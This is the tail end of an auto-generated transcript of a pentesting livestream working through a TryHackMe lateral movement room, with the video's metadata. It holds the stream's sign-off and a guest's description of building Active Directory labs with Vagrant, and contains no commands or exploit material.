not going to install on all users look at my syntax there as a result you used to see a connection okay did we trigger right hey hey doing good so far moving with wmi for fun heck yeah what's this next one look like looks like a lot okay well how much have we completed so far we done four tasks we got four left look at that i think that's a perfect spot to end part one and uh we'll finish up part two tomorrow it is midnight where i am at so for those of you watching twitch discord youtube hey thank you seriously for hanging out amoeba man thank you again for joining uh for those of you who follow us a mutman's been on quite a few helping us explain things and we are going to on uh this confuses me when i look at my clock on uh midnight it's kind of tuesday for me but on thursday so not tomorrow night when i stream tomorrow night i will finish this room hopefully we'll do part two and finish this room up but then on thursday evening the plan is that amoeba man is going to join us and he's going to walk us through spinning up uh our own active directory network for lab do i have that right amoeba man any details you want to add there to my explanation no i'm basically just spinning up active directory labs using flagrant which is used for infrastructure as code so it's something i use uh tryhackme and my day job as well because often we need network due to tests or these other things so all of these networks were created by vagrant so you would have noticed in the networks there's a vagrant user on on all of those machines and that's basically the provisioner which is creating those machines for you and once you sort of like have a baseline vagrant thing running um you can run vagrant up and then leave it for for quite some time and then it's just going to boot up your entire active directory network for you so it's a nice way to create sort of like baseline templates for yourself that you can then use to to modify to do whatever you want that is awesome man it's gonna be exciting to learn learned that i have like a very small ad lab i made up with virtualbox but it it was a lot of just manual labor and time to do that so um yeah that'll be fun so for those of you watching join back thursday evening uh around 10 p.m central time you can do the time translation and we're gonna spend uh that that stream doing that and of course as usual it'll be recorded after the fact on twitch as well as on youtube and i'll spam it out to the best of my ability elsewhere so once again for all the those of you watching thank you again for hanging out thank you for sticking through and we will do part two tomorrow evening same place same time i'll see you guys then

Info

Channel: Tyler Ramsbey

Views: 11,728

Rating: undefined out of 5

Keywords: lateral movement and pivoting, tryhackme, lateral movement, active directory hacking, oscp study, oscp, tyler ramsbey, hack_smarter, offensive security, pentesting, cybersecurity

Id: basSfhSJW0Y

Channel Id: undefined

Length: 88min 5sec (5285 seconds)

Published: Wed Jun 29 2022